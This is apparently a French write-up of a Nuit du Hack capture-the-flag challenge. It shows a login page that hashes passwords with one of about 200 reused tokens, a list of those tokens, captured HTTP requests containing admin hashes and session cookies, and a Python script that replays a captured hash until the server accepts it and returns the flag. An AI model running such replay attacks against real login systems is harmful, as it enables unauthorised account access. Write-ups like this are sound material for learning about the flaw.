Table des matières

Zombie Online Massive Game

Overview

On se retrouve avec une page web qui présente une page d'authentification. De plus, l'énoncé nous donne une capture tcp.

<html>
<head>
<link href="css/style.css" rel="stylesheet" type="text/css">
<title>Zombie Online Massive Game :: Admin</title>
<script src="zomg.js"></script>
</head>
<body>
 
<script>var zomgToken='gc4z6l8smmzhowh8rsj8wkm!!b.sf6fhf-]dlfs3';</script>
<div id="login_form">
	<div id="login_top">
	</div>
	<div id="login_alert">
 
	</div>
	<div id="login_fields">
		<form action="" method="POST">
			<label for="username">Username:</label>
			<input type="text" name="username" id="username"/><br/>
			<label for="password">Password:</label>
			<input type="password" name="password" id="password"/>
		</form>
		<button onclick="javascript:zomgDoAuth()" id="login_button"></button>
	</div>
	<div id="login_bottom"></div>
</div>
</body>
</html>
/* ZOMG JS resources */
 
//var CryptoJS= racourcis - permet de calculer des hashs
 
/* zomg authenticate hook */
function zomgDoAuth() {
	var username = document.getElementById('username').value;
	var password = document.getElementById('password').value;
	var token = zomgToken;
	var zomgForm = document.forms[0];
	if (username.length>0 && password.length>0)
	{	
		/* compute challenge answer */
		var answer = CryptoJS.MD5(token+':'+username+':'+password);
		document.getElementById('password').value = answer;
		zomgForm.submit();
	}
 
}

Analyse de la page

Bref, rien de bien compliqué à comprendre sur la page. Juste avant d'envoyer le formulaire, le hash md5 du mot de passe salté avec un cookie et le pseudo est calculé, puis le formulaire est envoyé.

Le token semble aléatoire, mais il n'en est rien. En envoyant quelques requêtes, on se rend compte qu'il y a en fait environ 200 tokens différents. C'est pas énorme.

Liste des tokens

:r]x]b5bv.,5ao6weahqnaiq-e2a1nqv[3]mlsge
29.,,ndwn4ny8]qeq9m[heu=$[di$dlwozwebn.n
:8,54d9=[6fehbf[m9k48p$psc8:ckh$g9!!2-q1
14ca8qf0:l=k9mg3kb31d8[quulv[vum9n78hs]p
_g=4fvsi5_q6$$:pj6[,84wmzab-4[c4l7,=75.f
8!6:dl=2wfavl$d4j2hu1]9k=6,z3e,1q$2!!mj$
xhcg8p$k![kuy$_y,85gi0.toferm,8l7r[9[36_
jx,=y7c=oz553jiqs=$bc$zonxuqx-omanembq,6
jjyyb.eo-dd47,9uv7fl-03p-$=y688:heb=!lw0
l7d24cpywb81:vqht7q7zu[.emgc=]ojx3f6-ste
s=h!_z!by7pwq5df-r-te:y99ljh].b=2.17]gl,
7n_pialz1h.v]1laosfeeyts.tp1j83d_i3il1z0
:_zul:$u-=]n!!sp[!9klvl]js:rsjipjm!a0!z9
]u2t.q]g:dj0g8rs3[nw3mr-wrx]5--mpqvbvpqa
c_ldo8_.q6pp4][ttu=rf]g7-gy[3q3q49w-qc[$
,ng61jccvx-tr97:63m$vg32lm,psjfp.mtvgb$3
lzum_26073c::tr:$j[]8]2u2_ko!gxibkkar5s$
h$3va=n71i5oiwlhus=j97xggeh=3$n!e:4_e-42
8v:or.ju9ie:g:4scd7v=g3m=b-pig9j$7yu!mfy
kgsqk-1ue5$z5.m.3z54m2uckemzp872me,zsvxn
t9vozvrim0hnx9g0ecc0vy-8bzh_5kjpy6q,neot
uv,$k$roj-ov7x,kx3a4[.rolqd[0b]0skaxp8_m
!z,ns8z8v5.]2]vi9fg9[50213q:it.7y_2ms13:
1y1dk:t.65pb48gju,mej!rd1].h:$dz44vtyest
u,qwmkpojm!agdozdl2jj,noq5lj[q[,g0x=:8u,
tc:rq$9pv-3z:=lp]:q8agmor37m8br2mt8vbrgk
f!g0g[kp,n.4wy!ul49k.]sf2hqd!ed!xjtw1tla
3c!q.h-]e2j5t1xsefj$0sroo2y-1cd5e=2i-1rx
s9,,8x!sv[[]3vrbi6m9b.6k97[$$sfc$6hvqjf3
j8heb9jxjs2ecfbxe5jtjhudff-$p4xy_:f-8ncu
wknxl1uff8-nyo3:nzybozq9m,6f7o=qws4mte7t
x-kp3lct44qt.6fpozfjvx9er:$vz0golj!]ot2w
5bk$n$18.r.tuye6f3ey:c3.$ynvv9yfzmjl,-d-
a]a3r,=-ggo3ml73d:v9i4s6r.b5j2e.v4ef-!a4
[i_,evq5],!1aubm9od6[m49:6a[=pz_gr=-wf5g
-00y4ws4:kxaab-q05x[$dnb=]l5:axjo-$r1_3p
-f6qohip0ql316htxo$=8lb.r[itai=b]!9j0nnw
zuy0a:_ytout8x8lyq28ob4n[o2fz:v1$egvzcvn
o3x]gwtrh,9nx2fu$[ac]nvbvghnw7fpvp[4.=dn
0,nyp.v]c$_881-2a4if0se4ogbco913b8p=z,07
rtukmo2x$zrj!=og4.e9xjjwo-xcygi99-cm9y4_
ro-k=]u2!:b5q-wg_xf]px3w00p_70]pd,pabwoh
z,8-g9s5b4[vhs6572k33!r.9931x7i$!qizo!2h
[t1:1f,5_:jvhz,ygxv]6m7mipd,j.,rna6537oo
agr=twmm955=9zp4d:v8wwca0prkf67d.k_.2],$
kctd28l1wcuqc59=[g7-y,z11wo8-3ub.3_y12wo
3o40[$_]wys[xj43e!2a=6]nygl3u!sg]1twsa!i
9[zz0uu[stu=ch3o4q1eolmvu9][gk[3[0_.7v4d
h3$y2q6qn3$i$m8ipk7al9x1b[fhhmvho]9:szcf
9j9sigb231!8:r9]w_6d-hban7dvpu.oda5z_fqo
r4ru=-,p!xn1rj[kscx1.],qyqx_9ov0fti4su:9
gzygzo2fw3qpz_qffsj$i]h!-gt]7b6!!nx,u-px
:$t2.glh4ce__3=m_79v!2ddunm7c.j-j7q2g:69
f]3p0prqe40s29-9]6nj62uxqz57mbx4d][mv8n-
!m4]bakt]n4c7az,]fzv,,ce8np64mu.jazrqscf
dk7nv:ttf81-z[3r!$oufp]:k3,60j[4=rj6br4o
yy!2=m[w.ml7b!0[q[.aubjvt0.m1d][=_5vpuew
_ycbiop6effran!$_=8[ph7w4ruoy]49zr2=o$:,
8!54zkvgh8i1:u]hz7koj]sts6eu_lensqyzv3a7
p:ixqjtafh:am7g33pr[1puyofu6q6fz=h$kcay3
y-k7j455a3yzku_xacq.$jr[v6cisr-6l34=.id8
.ze2.l=1,i1r,4q4za07hx,aninac7xln0ts8:2n
!nh!08fsp33!has9ij9.a_ontgvul.l1nl=wdu79
ot2pn7gxigo58[p-qqi!ka902y5labo,dx2ppp5d
,ck4ipr0uvf4b49_0[6=$$xxz-s9f8:nzw-yu-eo
s!st![i73rfyx4:1x7j,wu4]hq0p.gbf-h82[6.!
[_hi-uesuhk3oqo:x:af$2dpm4l31ur]_9wk5$kd
.l[nx![]2o6e=$wdflwm3puad5=:ccuf=fr6u=_r
ylyok72:gi4i6[:mne]e5gv.x3lv$x72n-zd!$:$
7:l-i9:w:m5-.s,pbe3lnwm[5aey=,p$p-vkg_4:
pvfd42cx0].5y7l4]owk8vlyc!5s18j,:w10j2i[
l.y$hlvbst0,tjzi47dje-izssger!zxs-8s5a.5
742j7thyb,$![[m]hfo,egfscsyh9vetnh-7u5ig
ac.bp,=8f.318q,qbrqirbct$95mcm51!a!cth,_
1y1]r[l7_iv]t.r0[q2lzwx-mjwehwwch_p[o.!q
terd2yon]klccg6.u:!uf$igk=plqq$k5gk0i$df
!37d,$6hjws7yc!=]oqka__a!1p[t-s!.5u.xhm6
vd$5q=ut=013l=og16x7or1u8.d13nm65l.lg]t-
2m[=:ve=,yi:0[l2t4,fm!_ffajfxkj=$ypp$ut5
jjdi4540u:2y=]$k40sndu]$engeej6-m4_ixjkx
:i6]4qf0gx5ev]rpw-yf6:uq2=g:6f.68rwp9g5w
y$k=5848p3qkx_e$uv$bf:-r]4,n-5nod9cva5f7
0q9y02yrs5493$rjzkxcw8k-4sgc62ww]:qnct93
0r5l=b[j.5f2f]se8,fe_3dsxo!10a2y9[bt6-8w
yq982,ou7e31fp=sacq[d_ju-iw[to8avuudvtdn
!q6ji$:.=4we:=i6i-:oi0dl,ddiur6sh!i-gv$:
hl8,5=[reb8-nhwzhwn3$!t4gb6i9u8q!]bi:3[_
pj8,_0ly!.br9]1c4y_4of[e4c7ziau1h4!m1upg
4.p3bkt[13wd3z2-69njv$cg8.=bf=q8t3[0z4rq
ezmrfmp,39rja3r[un-!q0j[g3ngx3gpaqgob6o[
.y=7=gg02nk030nl1d[,a0z=$llc7jr[znfbefg5
hy:dajlwuv6c45e]du_[ee]4i9[n5qqpc2p-t[ye
u1:ej.l5ga62:==_d,2zwhm$h9i7!qestg2qzifi
jvii$cfuuft=6l5554s0hno,ma24t7jdr..4yme,
t4coxr9i0n4!b0-[q:=dv8rjma1q3w921v=ed:m!
3t5ad50uod.7tz4[ly]ffrov162rn4wr:z==aws]
nng46e5q$gxoth_1h.p.3sl778p=r0y_m[1h!1_u
kzhf7q:1=a5,xbwc3$o17$bu9la.u38cukkbjl=v
[ohien3!jekv-xsgi0jja],34,c8gdi0h5amofcp
9_g$zt_8g=y_jwx.fuo7[jgcn750[t9s8a7!!fpe
0-qhkj$,uooxpdz7t1ut1g,[tjkozuc=774ss.[-
yw80mvp,1vws9zvcy1_$r9w,nw5w,bh-!$etv[a1
:ihnoe3.6d!9eica2sf:$t72ag!gmyfi9tmzaz,y
1z19mv2!6ir-5uh$_pghmuaab0r[.rjjr_sr:ozq
b$]]-b!dhq,ma.hdn5s9th-_i]hixwth]u!6hx1]
4a9$r:]0k13hv5$3dia!5j]l!bx6xk0=vj:y,f71
5cnz,b6sb=jkv6daaz90xo.1i,0m5qwef]s2rrnu
,!wi8!4o4ho.opwp6ip3xh_.l75howd8xues$fsk
2f!=sgj]w=himvaiuy8$j!lmy.nnsl.-2a:up1.s
8z:1kxuxr=r6!]ivd$g-3noh0_$4vri[fznzv]4=
7xmd26r0.!l=n92emhgku04xx8]qn_bn-p,a[ioz
wzluz=p5z]endxsgf4.s]3,5i:dlx$]!22fdhs.y
2-08z]2au!,tkqfobdlmq9i=8gtds13zjo9[u$xp
3nr[um$d!ylc0dfs.g3vt5o4sh5hbyu![bzl:3hp
ot5al4q=yfg7-gra,9bgzn-596pm7p=up!:7twaw
-fymexz,ogwk5_vvlxlv3[5c1n7j332!wgd,k2eq
q8oo0uxsqqfyzlv51xt05ot:b,ngf.cu_m9:jajk
leccoo[,fv3ge4djd$$uor15p4mu3860jg[z!t_j
30w52fzmc$2$mlg$z.8160=jevin$sm_ckth$8qi
opcrumqmh=x3bwzchcnvj9pufs9=bnzd-[f0uw7v
_,.0_[x57=a9lgcedq5bei!7dm:gt4e:8]=kbyfw
$twl9c707v4xfo]=o0-ocg0r6bvs4gsc0hnr[-bp
]!552i-is47z!=c5wk,b-j6oiaj9ilf,fr$iwwz[
gak0etv]w4=]9ia_40y:6c!cgm9dfy.hixx2wfn7
3t.9jp_8e6sowc8lizb3==veruitayokd7uh5uj_
.bnq=axrl45i,mo6aiw-hgoc:e$g9d9=viz.qd7r
03e6:ygce-5:0buvdryoxngngydlyofr7nty46a7
$oz9.d0y[4en,:jk_m,o.7zd6ow0if[9777-2z:n
6sho_d-zb8sb,ew06me7exbx0ym.tmjpx[j=_wiu
g,6,hcn.,pw39iez:5-wf$g_03weuv7ps!e6yxc3
z.=]-1b][p_gp[4o$gt-xj0,b7d]yh33=43-_qvp
n.36!ntk0n0-gi-tlyum7irlq4-j_pp,$fa8m[r3
1a,gbc1:pdv:drol=5klk:-1.iwt-.9vwi_icot[
wgnb,,4g9h0xa08y.pu!vrn7y,ec6inrol39yn[f
mpyyebj3d,zfalpwul,a7odz$kh5j,w.6ug3z.9e
l2]ld=fe[q,!6sor-9_q1u29313-,5eip!j,st2!
w=sx0,fp4ij54tqh7u1vl=3m90!yov[4=z0jwt.h
_q$wiptmc!0gq$rojmxl]i,3jinbui0yg7x1e=_e
j=$bkjl[3m-1jxg,df]9v2616]f-w4g6yxs.ktz5
4e-z86ew477[64oefzn:r:6e8xxq.inwqi8kerg0
m1u1:nmh9x809c8:98qpf.:so-7kobgmgat2lt85
:z$bpqlml[-[f:vxx,9wa5!lm1uplt_9$o2$[7:,
gc4z6l8smmzhowh8rsj8wkm!!b.sf6fhf-]dlfs3
zw93aj:d_nsc]7btu4e!vdwbxsh,xkk1=--fu1l8
,2=3vmjvcu,_ulfi903xiv,-eb3,w6nyz9kx[otq
cay9i:pxmx6,a[is0xer,[[z6.$u065,b:mpyp=,
27=rigbi6s.d7$!d:.b48ev=,n,ta6e..=0n:-c0
bluz.$s1jgnl191aq.12j8rmi[l6_6l_t=o6ho:y
dbzlx_=q-9,3rfo9hd$17,!sdjyixazv-:qz-gc$
rz_l,-i[64[ii.i7!b!mn2_,c]hekb]qvqwll[q1
pu]28jv22.djb!tl,lotx77$119vw$lox]q,qdm8
y41q!a.$i7n5w607.b$cwx241_cqa9$3[b!$,sov
=-3bx:,ryem0zh78xwsml1bdjt-][f1n5.co$c:g
v_ige$kgw04_vd1,:w8xkqttji]dhj238c9d!h.j
477he2c2umakpg.79lu,1u7j[.18ws$!y]_k3[.t
9p$w.k$._izjq2b5-2x!o]_kpmz36qd!wedby:6:
fnpw8vo0fnb[n8ai4jtzsdoc00_:kz-yxeurc:c8
9k3[v_o[b10z1do9va4__5pp4l3]oscobzzk73t3
rw-p6e79pjbr-j1p29r9]6u-dgmchk=hknctgwqv
yspw$2hzg]p=o$-h4z252hybrqs:ax]_l:v1[irt
la=n6g7kh82zl0].ftyai2bh:5hlw-u9=j0[j0af
i4grm[z8jzi_usqzlhk7y_x1s!33p.s[=..eyvrz
2ssb2j.pylijqcr6,,3s6t4i.v8,853h$_4a_q]9
t[yqb8525t:l$j4o03m2obar!s.6798f8cm1qk_f
=d$1wwwsgq[5-vd93bje9233_zn$m[=kw6c!.a]o
nq=lxb7-e2ro4cw_!$0]=,l[93coelr[c5ux9:eg
qawb2-zp4w:i6_!5$i5w!isw[jk4_vcwnzjvwgsy
ur!1fhpyt[-j$obw$z0$rp6f,$e9h1$]6utlz4mh
on7x6=p6fct$:i=qpwp=f]_]_5nwa1a3-fmg:z-w
x--0-dg_w2h,:a!dtqur0:keki__uqsmmsj_2beq
7[p31a:xz]i7,cs]bkysq738_i8d$v5w=3p[wd9d
,ylr1ks7ix._t8=8rsdxm]z-ngciq:t1yub-h0uv
$,6q34puq,x-,wsf$cfrzf3i2g,o1$a,rzlk5oo0
oiejf!jpii1i$7:fu$lld0![,efkp=yfxz=q-3fp
qz2![!wcg__69,y8zf6n:cruzl,c1]bvr:v2kfte
4a2y4u_1!z:l3:uyhe6oasux4]bgev9q[.p:qt3z
f,0oe::v5029o:xupo2rn390aq=e0!t,6romx94c
9.soa]b2u:f5swhx069=pmd=y:pzr53b5p[w-1,a
=-91$fc:$0r35,hm7p=8wyum:tv8cke36ok4wrvh
c,y[,[$z.b:9191r.nu8lk1j6omp!x0rkk3r9mi.
kq_-iryv6$j85=rs30bju17g..!6]rynf_m:ihw8
iyc:xkv]wyzm46.m4l,x=7our]w-f2$n29oagp2]
.9=,hso-wz]i7t9:xx7_,,$n_fga9=3=$,9=tfj1
]hppbkplt9]dtb=:oqcjl:3qr5[bsw958i4rq=a1
-9e,$p1vt:p4!a]3!05,cy=i_g$fethl9=y7u0,-
zqf2$skn6og382q_cz5[pru]uucal,zy7vq3dlv]
z]cp4q$5cll[ysy.tc!2t46a6d$is9$3nf1z-288
.iw-lw2:52p6i6-=x=hy-c_nti99n0lj[ci5-nhz
ryg8k5vgb5ntjy8szc!hf,!uwv,3xszw$51=4,m7
_vt5bj.pu[i]yyx4l[xp7gey1$8et7e2mm9q2v[.
ru=wt_7_[fns900pu3wncf1$hg7!_.3gan1isn9d
g7:g_]5eeo,ye,v15b-9e4ky_fd!:p:8q-m$cwc$
],-oiuflss7boq2xcxq4v76[:0=binhq_moi3c-.
.y!y[y[0_v58r9]waogg5!ar25o[]xdc-hao]a9,
.c$u]2uy24fc-flutzuyxo_zgx80dauls,ks4r[4
,c77gh684$_k]c54c=kn3rkzqo14j[!typztrnza
k!ihoinfa8zvhh_sah][cagr!:]qiqs_u0d7p4:h
ds=f,,bmsyut7j]5q$avh,o777zno,,6]b7k,4c.
09=]e8[b2.yepq5ukgp8wo197rkrh22l4,idqrc]
.jhjk!.z4qoj8m6oeobun:,a7ygw-se$c9uy3cqt

Analyse de la capture TCP

La capture TCP referme une session TCP sur le site en question. On y trouve deux requêtes HTTP différentes, ainsi qu'une réponse.

POST / HTTP/1.1
Host: public.nuitduhack.com:8009
Origin: http://public.nuitduhack.com:8009
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.22+ (KHTML, like Gecko) Chromium/17.0.963.56 Chrome/17.0.963.56 Safari/535.22+ Epiphany/3.4.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://public.nuitduhack.com:8009/
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Cookie: SESS0a1ee27932bc06da50674c8c14a5e20b=8qf3fbobdbfrs2g1vs6s1gokc5; SESS2c1a862b4fab9ef42a74fc1be0892571=r4slnc7qd9ihg8tnau1telej60; __utma=114525464.2112388856.1338920171.1340047390.1340053513.8; __utmz=114525464.1340047390.7.2.utmcsr=t.co|utmccn=(referral)|utmcmd=referral|utmcct=/dhGNVGsO; PHPSESSID=2l0loe6li4feofjscuu32ohb54
Content-Length: 56
username=admin&password=1349e61e13325795c02ad26b0ab53dda
POST / HTTP/1.1
Host: public.nuitduhack.com:8009
Origin: http://public.nuitduhack.com:8009
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.22+ (KHTML, like Gecko) Chromium/17.0.963.56 Chrome/17.0.963.56 Safari/535.22+ Epiphany/3.4.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://public.nuitduhack.com:8009/
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Cookie: SESS0a1ee27932bc06da50674c8c14a5e20b=8qf3fbobdbfrs2g1vs6s1gokc5; SESS2c1a862b4fab9ef42a74fc1be0892571=r4slnc7qd9ihg8tnau1telej60; __utma=114525464.2112388856.1338920171.1340047390.1340053513.8; __utmz=114525464.1340047390.7.2.utmcsr=t.co|utmccn=(referral)|utmcmd=referral|utmcct=/dhGNVGsO; PHPSESSID=2l0loe6li4feofjscuu32ohb54
Content-Length: 56
username=admin&password=39d7720343ac3430570f202dde3ab803

Première piste (mauvaise piste)

Nous avons environ 200 tokens. On possède aussi deux hashs. L'un deux doit probablement correspondre au mot de passe à trouver. On se met donc à brute forcer. Après avoir attendu un bon moment, on commence à se poser des questions. C'est visiblement pas la solution.

Seconde piste (la bonne!)

Toujours avec nos 200 tokens… Finalement, si on envoie des requêtes avec notre mot de passe hashé et notre login qui vont bien (ceux récupérés dans la capture), on va finir par tomber sur le bon token! Hop hop hop, on code ça, et on laisse tourner environ 2 minutes… Et là, oh magie, on obtient le flag :)

#!/usr/bin/env python
# encoding: utf-8
 
import httplib
 
def main():
 
    headers = {"Cookie":"PHPSESSID=9p22omkei1cb5517kk93s5ql53;",
               "Content-Type":"application/x-www-form-urlencoded"}
    while True:
 
        conn = httplib.HTTPConnection("54.247.160.116:8009")
        conn.request("POST","/","username=admin&password=39d7720343ac3430570f202dde3ab803",headers)
        rep = conn.getresponse().read()
        if rep.count("Flag") > 0:
            print rep
            break
 
 
if __name__ == '__main__':
    main()
<html>
<head>
<link href="css/style.css" rel="stylesheet" type="text/css">
<title>Zombie Online Massive Game :: Admin</title>
<script src="zomg.js"></script>
</head>
<body>
 
<div id="login_form">
	<div id="login_top">
	</div>
	<div id="login_alert">
		Flag: 8f5741fe00598d1463773708f5743285 
	</div>
	<div id="login_bottom"></div>
</div>
 
</body>
</html>